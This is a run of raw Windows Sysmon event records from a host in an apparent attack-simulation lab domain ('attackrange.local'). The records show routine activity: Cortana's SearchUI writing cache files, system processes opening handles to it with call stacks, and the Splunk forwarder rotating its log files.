12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.963{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-03-31 12:02:30.963 11241100x80000000000000006651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-03-31 12:02:30.947 23542300x80000000000000006650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.947{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txtMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000006649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-03-31 12:02:30.947 11241100x80000000000000006648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\container.dat2021-03-31 12:02:30.947 11241100x80000000000000006647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.947{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\container.dat2021-03-31 12:02:30.947 11241100x80000000000000006646Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.885{266CAFBE-64C4-6064-9E00-00000000AE01}3120C:\Windows\system32\taskhostw.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\container.dat2021-03-31 12:02:30.885 
10341000x80000000000000006645Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5266|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006644Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006643Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006642Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+521d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000006641Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006640Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x80000000000000006639Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.869{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+47a7|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+770f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x80000000000000006638Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.838{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006637Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.838{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006636Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.714{266CAFBE-64C4-6064-9B00-00000000AE01}49246000C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+14e60|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006635Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.449{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000006634Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.449{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=02DF3FB4AC0CFED6C93778121BB20E25,SHA256=14BE34FE7B55BBEE758DB6D8445A3FE0DBFE0C7E20F8A9595E9E6FA18026F00B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006633Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.449{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006632Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.449{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006631Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:30.433{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006630Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.433{266CAFBE-646A-6064-0B00-00000000AE01}8564500C:\Windows\system32\lsass.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
23542300x80000000000000006629Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=90688578FA63C65FE9A2CD863BE7F852,SHA256=2ADF436EBD0528A1AE374762FFFE6C30183F2A27C8EBC0C0D893081BCF382C0F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000006628Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.418{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
